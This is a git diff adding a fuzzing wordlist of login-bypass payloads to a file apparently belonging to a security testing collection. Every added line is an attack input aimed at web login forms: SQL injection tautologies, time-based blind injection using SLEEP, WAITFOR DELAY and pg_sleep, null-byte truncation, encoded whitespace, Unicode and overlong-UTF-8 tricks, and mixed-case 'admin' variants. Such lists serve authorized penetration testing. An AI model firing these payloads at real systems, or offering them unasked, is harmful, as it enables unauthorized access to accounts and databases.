diff --git a/Fuzzing/login_bypass.txt b/Fuzzing/login_bypass.txt index 19110026..bc1b8481 100644 --- a/Fuzzing/login_bypass.txt +++ b/Fuzzing/login_bypass.txt @@ -1,3 +1,71 @@ +admin% +%admin +%admin% +_admin +admin_ +a_min +a%min +aaaaaaaaaaaaaaaa +admin00000000000 +adminxxxxxxxxxxx +admin\x00\x00\x00\x00 +admin%20 +admin%09 +admin%0a +admin%0d +admin+ +admin%2b +%20admin +%09admin%20 +\u0061dmin +\u0070assword +ad\u006din +\u0041dmin +\u0061\u0064\u006d\u0069\u006e +\uFF41dmin +%c0%61dmin +%e0%80%61dmin +admin%00 +admin\x00 +admin\0 +admin%00'-- +admin\x00'-- +admin%00"-- +admin%00' OR '1'='1 +admin\0' OR '1'='1 +password%00 +password\x00 +admin' AND SLEEP(5)-- +admin' AND SLEEP(10)# +admin' AND BENCHMARK(1000000,MD5('test'))-- +admin' WAITFOR DELAY '0:0:5'-- +admin' WAITFOR DELAY '0:0:10'# +admin' AND pg_sleep(5)-- +admin'; SELECT pg_sleep(10)-- +admin' UNION SELECT IF(1=1,SLEEP(5),0)-- +admin') AND SLEEP(5)-- +admin") AND SLEEP(5)-- +admin' AND 'x'<>'y +admin' AND 1<2-- +admin' AND 2>1-- +admin' AND 3<>4# +admin' AND EXISTS(SELECT * FROM users)-- +admin' AND NOT EXISTS(SELECT * FROM fake_table)-- +admin' AND LENGTH('a')=1-- +admin' AND ASCII('a')=97-- +admin') AND 'x'='x +admin") AND "x"="x +AdMiN +ADMIN +aDmIn +AdMiN'-- +ADMIN'-- +aDmIn'# +AdMiN"-- +ADMIN"-- +aDmIn"# +AdMiN'oR'1'='1 +ADMIN'oR'1'='1 admin password 1234